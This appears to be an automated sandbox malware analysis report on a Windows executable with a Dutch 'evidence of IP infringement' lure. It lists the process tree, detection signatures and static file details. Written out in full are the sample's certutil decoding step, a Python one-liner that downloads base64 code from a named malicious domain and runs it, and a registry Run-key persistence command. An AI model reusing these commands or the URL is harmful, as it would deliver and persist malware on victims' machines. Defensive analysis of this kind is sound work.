Edit tour

Windows Analysis Report
Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe

Overview

General Information

Sample name:	Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe
Analysis ID:	1596725
MD5:	4864a55cff27f686023456a22371e790
SHA1:	6ed30c0371fe167d38411bfa6d720fcdcacc4f4c
SHA256:	08c7fb6067acc8ac207d28ab616c9ea5bc0d394956455d6a3eecb73f8010f7a2
Infos:

Detection

Score:	40
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Compliance

Score:	31
Range:	0 - 100

Signatures

Antivirus detection for URL or domain

Creates an autostart registry key pointing to binary in C:\Windows

Modifies existing user documents (likely ransomware behavior)

Sigma detected: Execution from Suspicious Folder

Sigma detected: Legitimate Application Dropped Archive

Sigma detected: Legitimate Application Dropped Script

Sigma detected: New RUN Key Pointing to Suspicious Folder

Sigma detected: Suspicious Program Location with Network Connections

Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected suspicious crossdomain redirect

Drops PE files

Drops certificate files (DER)

EXE planting / hijacking vulnerabilities found

Found dropped PE file which has not been started or loaded

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Direct Autorun Keys Modification

Sigma detected: Explorer Process Tree Break

Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE

Stores large binary data to the registry

Suricata IDS alerts with low severity for network traffic

Too many similar processes found

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses reg.exe to modify the Windows registry

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

System is w11x64_office

Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe (PID: 6800 cmdline: "C:\Users\user\Desktop\Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe" MD5: 4864A55CFF27F686023456A22371E790)

cmd.exe (PID: 6820 cmdline: cmd /c "C:\Users\user\Desktop\\Document.pdf" MD5: 7B2C2B671D3F48A01B334A0070DEC0BD)

conhost.exe (PID: 6836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 9698384842DA735D80D278A427A229AB)

Acrobat.exe (PID: 8972 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\Document.pdf" MD5: 4354BCD7483AABB81809350484FFD58F)

cmd.exe (PID: 6828 cmdline: cmd /c "C:\Users\user\Desktop\\EFOYFBOLXA.png.cmd" MD5: 7B2C2B671D3F48A01B334A0070DEC0BD)

conhost.exe (PID: 6888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 9698384842DA735D80D278A427A229AB)

cmd.exe (PID: 6840 cmdline: cmd /c "C:\Users\user\Desktop\\Evidence.docx.cmd" MD5: 7B2C2B671D3F48A01B334A0070DEC0BD)

conhost.exe (PID: 1008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 9698384842DA735D80D278A427A229AB)

timeout.exe (PID: 9280 cmdline: timeout /t 5 /nobreak MD5: BFF80EE570A533A673DAE68D957B0954)

attrib.exe (PID: 9572 cmdline: attrib -s -h -r VERSION.DLL MD5: 41C498440D69D618E095D5A7B93B38B1)

certutil.exe (PID: 9604 cmdline: certutil -decode Document.pdf DzbIZ1HRMj.rar MD5: ECD9F5013933F9108E596230534BB715)

Images.exe (PID: 3028 cmdline: images x -pAnfoE5FeC6R5dPfRbxQgKMtZdV6v0OKC -inul -y DzbIZ1HRMj.rar C:\Users\Public\VIP4YmtQLN MD5: 01F28B85ABF1993B7B14B3D15346F2E8)

synaptics.exe (PID: 2428 cmdline: "C:\Users\Public\VIP4YmtQLN\synaptics.exe" -c "import requests,base64; exec(base64.b64decode(requests.get('https://zwaregroup.com/buildergroup/cgi-bin/bin/Adonis/Adonis_ALL').text))" MD5: 8AD6C16026FF6C01453D5FA392C14CB4)

certutil.exe (PID: 3568 cmdline: certutil -f -decode "C:\Users\Public\Windows Service.~b64" "C:\Users\Public\Windows Service.bat" MD5: ECD9F5013933F9108E596230534BB715)

reg.exe (PID: 6380 cmdline: reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Service" /t REG_SZ /d "C:\Windows\Explorer.EXE C:\Users\Public\Windows Service.bat" /f MD5: 9D37B21512D87C54E4AE5196718EE84A)

cmd.exe (PID: 6860 cmdline: cmd /c "C:\Users\user\Desktop\\GAOBCVIQIJ.png.cmd" MD5: 7B2C2B671D3F48A01B334A0070DEC0BD)

conhost.exe (PID: 1880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 9698384842DA735D80D278A427A229AB)

cmd.exe (PID: 6720 cmdline: cmd /c "C:\Users\user\Desktop\\IPKGELNTQY.docx.cmd" MD5: 7B2C2B671D3F48A01B334A0070DEC0BD)

conhost.exe (PID: 6852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 9698384842DA735D80D278A427A229AB)

cmd.exe (PID: 6032 cmdline: cmd /c "C:\Users\user\Desktop\\LSBIHQFDVT.docx.cmd" MD5: 7B2C2B671D3F48A01B334A0070DEC0BD)

conhost.exe (PID: 6692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 9698384842DA735D80D278A427A229AB)

cmd.exe (PID: 6768 cmdline: cmd /c "C:\Users\user\Desktop\\LSBIHQFDVT.pdf" MD5: 7B2C2B671D3F48A01B334A0070DEC0BD)

conhost.exe (PID: 7880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 9698384842DA735D80D278A427A229AB)

Acrobat.exe (PID: 8964 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\LSBIHQFDVT.pdf" MD5: 4354BCD7483AABB81809350484FFD58F)

cmd.exe (PID: 6884 cmdline: cmd /c "C:\Users\user\Desktop\\NEBFQQYWPS.docx.cmd" MD5: 7B2C2B671D3F48A01B334A0070DEC0BD)

conhost.exe (PID: 7612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 9698384842DA735D80D278A427A229AB)

cmd.exe (PID: 7692 cmdline: cmd /c "C:\Users\user\Desktop\\NEBFQQYWPS.xlsx.cmd" MD5: 7B2C2B671D3F48A01B334A0070DEC0BD)

conhost.exe (PID: 7784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 9698384842DA735D80D278A427A229AB)

cmd.exe (PID: 5636 cmdline: cmd /c "C:\Users\user\Desktop\\PALRGUCVEH.mp3.cmd" MD5: 7B2C2B671D3F48A01B334A0070DEC0BD)

conhost.exe (PID: 6848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 9698384842DA735D80D278A427A229AB)

cmd.exe (PID: 6600 cmdline: cmd /c "C:\Users\user\Desktop\\PIVFAGEAAV.png.cmd" MD5: 7B2C2B671D3F48A01B334A0070DEC0BD)

conhost.exe (PID: 8236 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 9698384842DA735D80D278A427A229AB)

cmd.exe (PID: 6264 cmdline: cmd /c "C:\Users\user\Desktop\\PWCCAWLGRE.jpg.cmd" MD5: 7B2C2B671D3F48A01B334A0070DEC0BD)

conhost.exe (PID: 8212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 9698384842DA735D80D278A427A229AB)

cmd.exe (PID: 2768 cmdline: cmd /c "C:\Users\user\Desktop\\QNCYCDFIJJ.mp3.cmd" MD5: 7B2C2B671D3F48A01B334A0070DEC0BD)

conhost.exe (PID: 8300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 9698384842DA735D80D278A427A229AB)

cmd.exe (PID: 7448 cmdline: cmd /c "C:\Users\user\Desktop\\QNCYCDFIJJ.pdf" MD5: 7B2C2B671D3F48A01B334A0070DEC0BD)

conhost.exe (PID: 8256 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 9698384842DA735D80D278A427A229AB)

Acrobat.exe (PID: 9000 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\QNCYCDFIJJ.pdf" MD5: 4354BCD7483AABB81809350484FFD58F)

AcroCEF.exe (PID: 9512 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: B104218348848F1F113AF11C0982931A)

AcroCEF.exe (PID: 9900 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/24.4.20272 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\UserData" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2104 --field-trial-handle=1672,i,12053433933964087944,11760444625678437277,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: B104218348848F1F113AF11C0982931A)

AdobeCollabSync.exe (PID: 9644 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe" -c MD5: 1C26C611BFACED153F60CB1653A8745D)

AdobeCollabSync.exe (PID: 10172 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe" -c --type=collab-renderer --proc=9644 MD5: 1C26C611BFACED153F60CB1653A8745D)

FullTrustNotifier.exe (PID: 3684 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe" GetChannelUri MD5: 92366A2F482926C3D0DD02D6F952F742)

AdobeCollabSync.exe (PID: 8876 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe" -c MD5: 1C26C611BFACED153F60CB1653A8745D)

AdobeCollabSync.exe (PID: 7784 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe" -c --type=collab-renderer --proc=8876 MD5: 1C26C611BFACED153F60CB1653A8745D)

adobe_licensing_wf_acro.exe (PID: 9024 cmdline: 9240 MD5: D54E48D4768DA60C8C28AF49D2862EE7)

cmd.exe (PID: 8224 cmdline: cmd /c "C:\Users\user\Desktop\\QNCYCDFIJJ.xlsx.cmd" MD5: 7B2C2B671D3F48A01B334A0070DEC0BD)

conhost.exe (PID: 8368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 9698384842DA735D80D278A427A229AB)

cmd.exe (PID: 8272 cmdline: cmd /c "C:\Users\user\Desktop\\SQSJKEBWDT.jpg.cmd" MD5: 7B2C2B671D3F48A01B334A0070DEC0BD)

conhost.exe (PID: 8448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 9698384842DA735D80D278A427A229AB)

cmd.exe (PID: 8292 cmdline: cmd /c "C:\Users\user\Desktop\\SQSJKEBWDT.mp3.cmd" MD5: 7B2C2B671D3F48A01B334A0070DEC0BD)

conhost.exe (PID: 8348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 9698384842DA735D80D278A427A229AB)

cmd.exe (PID: 8324 cmdline: cmd /c "C:\Users\user\Desktop\\SUAVTZKNFL.pdf" MD5: 7B2C2B671D3F48A01B334A0070DEC0BD)

conhost.exe (PID: 8456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 9698384842DA735D80D278A427A229AB)

Acrobat.exe (PID: 9024 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\SUAVTZKNFL.pdf" MD5: 4354BCD7483AABB81809350484FFD58F)

adobe_licensing_wf_helper_acro.exe (PID: 8980 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe" --type=gpu-process --no-sandbox --log-severity=disable --lang=en-US --cef-dll-path="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1" --gpu-preferences=UAAAAAAAAADgACAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\debug.log" --mojo-platform-channel-handle=1504 --field-trial-handle=1708,i,14820355870963590142,4218514559140099384,131072 --disable-features=WebRtcHideLocalIpsWithMdns /prefetch:2 MD5: 655A56A11FF0E2F0A6078D9DC2A79461)

adobe_licensing_wf_helper_acro.exe (PID: 4332 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --lang=en-US --cef-dll-path="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\debug.log" --mojo-platform-channel-handle=1828 --field-trial-handle=1708,i,14820355870963590142,4218514559140099384,131072 --disable-features=WebRtcHideLocalIpsWithMdns /prefetch:8 MD5: 655A56A11FF0E2F0A6078D9DC2A79461)

adobe_licensing_wf_helper_acro.exe (PID: 8704 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe" --type=renderer --log-severity=disable --cef-dll-path="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1" --first-renderer-process --no-sandbox --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\debug.log" --touch-events=enabled --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=4 --launch-time-ticks=5213362510 --mojo-platform-channel-handle=2228 --field-trial-handle=1708,i,14820355870963590142,4218514559140099384,131072 --disable-features=WebRtcHideLocalIpsWithMdns /prefetch:1 MD5: 655A56A11FF0E2F0A6078D9DC2A79461)

adobe_licensing_wf_helper_acro.exe (PID: 8888 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe" --type=renderer --log-severity=disable --cef-dll-path="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1" --no-sandbox --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\debug.log" --touch-events=enabled --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --launch-time-ticks=5213441251 --mojo-platform-channel-handle=2300 --field-trial-handle=1708,i,14820355870963590142,4218514559140099384,131072 --disable-features=WebRtcHideLocalIpsWithMdns /prefetch:1 MD5: 655A56A11FF0E2F0A6078D9DC2A79461)

adobe_licensing_wf_helper_acro.exe (PID: 3248 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe" --type=gpu-process --no-sandbox --log-severity=disable --lang=en-US --cef-dll-path="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1" --gpu-preferences=UAAAAAAAAADgACAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\debug.log" --mojo-platform-channel-handle=2340 --field-trial-handle=1708,i,14820355870963590142,4218514559140099384,131072 --disable-features=WebRtcHideLocalIpsWithMdns /prefetch:2 MD5: 655A56A11FF0E2F0A6078D9DC2A79461)

adobe_licensing_wf_helper_acro.exe (PID: 9460 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe" --type=renderer --log-severity=disable --cef-dll-path="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1" --no-sandbox --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\debug.log" --touch-events=enabled --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --launch-time-ticks=5225407327 --mojo-platform-channel-handle=2916 --field-trial-handle=1708,i,14820355870963590142,4218514559140099384,131072 --disable-features=WebRtcHideLocalIpsWithMdns /prefetch:1 MD5: 655A56A11FF0E2F0A6078D9DC2A79461)

cmd.exe (PID: 8400 cmdline: cmd /c "C:\Users\user\Desktop\\ZQIXMVQGAH.jpg.cmd" MD5: 7B2C2B671D3F48A01B334A0070DEC0BD)

conhost.exe (PID: 8476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 9698384842DA735D80D278A427A229AB)

cmd.exe (PID: 8488 cmdline: cmd /c "C:\Users\user\Desktop\\ZQIXMVQGAH.xlsx.cmd" MD5: 7B2C2B671D3F48A01B334A0070DEC0BD)

conhost.exe (PID: 8568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 9698384842DA735D80D278A427A229AB)

explorer.exe (PID: 8712 cmdline: "C:\Windows\Explorer.EXE" C:\Users\Public\Windows Service.bat MD5: E2D1F700066D39814081317462A0FD74)

explorer.exe (PID: 8428 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: E2D1F700066D39814081317462A0FD74)

cmd.exe (PID: 7140 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Windows Service.bat" " MD5: 428CEC6B0034E0F183EB5BAE887BE480)

conhost.exe (PID: 7400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 9698384842DA735D80D278A427A229AB)

synaptics.exe (PID: 9324 cmdline: "C:\Users\Public\VIP4YmtQLN\synaptics.exe" -c "import requests,base64; exec(base64.b64decode(requests.get('https://zwaregroup.com/buildergroup/cgi-bin/bin/Adonis/Adonis_ALL').text))" MD5: 8AD6C16026FF6C01453D5FA392C14CB4)

OpenConsole.exe (PID: 7664 cmdline: "C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.21.3231.0_x64__8wekyb3d8bbwe\OpenConsole.exe" -Embedding MD5: 10A3C05A139428FB6D17A11B9A257516)

WindowsTerminal.exe (PID: 3844 cmdline: "C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.21.3231.0_x64__8wekyb3d8bbwe\WindowsTerminal.exe" -Embedding MD5: F870908D432E534A3F0E93C18D1D9EE7)

explorer.exe (PID: 9100 cmdline: "C:\Windows\Explorer.EXE" C:\Users\Public\Windows Service.bat MD5: E2D1F700066D39814081317462A0FD74)

cleanup

Sigma Signatures

System Summary

Sigma detected: Execution from Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Users\Public\VIP4YmtQLN\synaptics.exe" -c "import requests,base64; exec(base64.b64decode(requests.get('https://zwaregroup.com/buildergroup/cgi-bin/bin/Adonis/Adonis_ALL').text))", CommandLine: "C:\Users\Public\VIP4YmtQLN\synaptics.exe" -c "import requests,base64; exec(base64.b64decode(requests.get('https://zwaregroup.com/buildergroup/cgi-bin/bin/Adonis/Adonis_ALL').text))", CommandLine|base64offset|contains: , Image: C:\Users\Public\VIP4YmtQLN\synaptics.exe, NewProcessName: C:\Users\Public\VIP4YmtQLN\synaptics.exe, OriginalFileName: C:\Users\Public\VIP4YmtQLN\synaptics.exe, ParentCommandLine: cmd /c "C:\Users\user\Desktop\\Evidence.docx.cmd", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6840, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Users\Public\VIP4YmtQLN\synaptics.exe" -c "import requests,base64; exec(base64.b64decode(requests.get('https://zwaregroup.com/buildergroup/cgi-bin/bin/Adonis/Adonis_ALL').text))", ProcessId: 2428, ProcessName: synaptics.exe

Sigma detected: Legitimate Application Dropped Archive

Source: File created

Author: frack113, Florian Roth: Data: EventID: 11, Image: C:\Windows\SysWOW64\certutil.exe, ProcessId: 9604, TargetFilename: C:\Users\user\Desktop\DzbIZ1HRMj.rar

Sigma detected: Legitimate Application Dropped Script

Source: File created

Author: frack113, Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\certutil.exe, ProcessId: 3568, TargetFilename: C:\Users\Public\Windows Service.bat

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Windows\Explorer.EXE C:\Users\Public\Windows Service.bat, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 6380, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Windows Service

Sigma detected: Suspicious Program Location with Network Connections

Source: Network Connection

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 52.44.208.207, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Users\Public\VIP4YmtQLN\synaptics.exe, Initiated: true, ProcessId: 2428, Protocol: tcp, SourceIp: 192.168.2.24, SourceIsIpv6: false, SourcePort: 64827

Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder

Source: File created

Author: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 6840, TargetFilename: C:\Users\Public\VIP4YmtQLN

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Windows\Explorer.EXE C:\Users\Public\Windows Service.bat, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 6380, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Windows Service

Sigma detected: Direct Autorun Keys Modification

Source: Process started

Author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Service" /t REG_SZ /d "C:\Windows\Explorer.EXE C:\Users\Public\Windows Service.bat" /f, CommandLine: reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Service" /t REG_SZ /d "C:\Windows\Explorer.EXE C:\Users\Public\Windows Service.bat" /f, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: cmd /c "C:\Users\user\Desktop\\Evidence.docx.cmd", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6840, ParentProcessName: cmd.exe, ProcessCommandLine: reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Service" /t REG_SZ /d "C:\Windows\Explorer.EXE C:\Users\Public\Windows Service.bat" /f, ProcessId: 6380, ProcessName: reg.exe

Sigma detected: Explorer Process Tree Break

Source: Process started

Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), @gott_cyber: Data: Command: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, CommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\explorer.exe, NewProcessName: C:\Windows\explorer.exe, OriginalFileName: C:\Windows\explorer.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 844, ProcessCommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, ProcessId: 8428, ProcessName: explorer.exe

Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Service" /t REG_SZ /d "C:\Windows\Explorer.EXE C:\Users\Public\Windows Service.bat" /f, CommandLine: reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Service" /t REG_SZ /d "C:\Windows\Explorer.EXE C:\Users\Public\Windows Service.bat" /f, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: cmd /c "C:\Users\user\Desktop\\Evidence.docx.cmd", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6840, ParentProcessName: cmd.exe, ProcessCommandLine: reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Service" /t REG_SZ /d "C:\Windows\Explorer.EXE C:\Users\Public\Windows Service.bat" /f, ProcessId: 6380, ProcessName: reg.exe

Suricata Signatures

ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-22T12:39:27.269650+0100	2022112	1	Exploit Kit Activity Detected	192.168.2.24	64818	172.66.0.163	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://zwaregroup.com/buildergroup/cgi-bin/bin/Adonis/Adonis_ALL	Avira URL Cloud: Label: malware
Source: https://zwaregroup.com/buildergroup/cgi-bin/bin/	Avira URL Cloud: Label: malware

Privilege Escalation

EXE planting / hijacking vulnerabilities found

Source: C:\Users\user\Desktop\Images.exe	EXE: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\pythonwin\Pythonwin.exe
Source: C:\Users\user\Desktop\Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe	EXE: cmd.exe			Jump to behavior

Compliance

EXE planting / hijacking vulnerabilities found

Source: C:\Users\user\Desktop\Images.exe	EXE: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\pythonwin\Pythonwin.exe
Source: C:\Users\user\Desktop\Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe	EXE: cmd.exe			Jump to behavior

Uses 32bit PE files

Source: Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

PE / OLE file has a valid certificate

Source: Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe

Static PE information: certificate valid

Binary contains paths to debug symbols

Source:	Binary string: /app/crashsubmit?appname=SumatraPDFhttp://www.haihaisoft.comlibmupdf.pdbSumatraPDF.pdbSumatraPDF-prereleaseSumatraPDF.pdbSumatraPDF-1.5.3.0.pdbSumatraPDF.pdblibmupdf.pdbSumatraPDF-no-MuPDF.pdbhttp://kjkpub.s3.amazonaws.com/sumatrapdf/prerel/SumatraPDF-prerelease-SVN_PRE_RELEASE_VER.pdb.zipsymbols_tmp.ziphttp://kjkpub.s3.amazonaws.com/sumatrapdf/rel/SumatraPDF-1.5.3.0.pdb.zipsymbols_tmp.zipSUMATRAPDF_FULLDUMPHaihaisoft PDF Reader crashedSorry, that shouldn't have happened! source: Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe, 00000000.00000002.14089172034.00000000006C9000.00000002.00000001.01000000.00000003.sdmp, Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe, 00000000.00000000.14064640682.00000000006C9000.00000002.00000001.01000000.00000003.sdmp
Source:	Binary string: SumatraPDF-no-MuPDF.pdb source: Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe, 00000000.00000002.14089172034.00000000006C9000.00000002.00000001.01000000.00000003.sdmp, Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe, 00000000.00000000.14064640682.00000000006C9000.00000002.00000001.01000000.00000003.sdmp
Source:	Binary string: d:\a01\_work\11\s\\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: Images.exe, 0000003D.00000003.14463912582.000001CC0ABBB000.00000004.00000020.00020000.00000000.sdmp
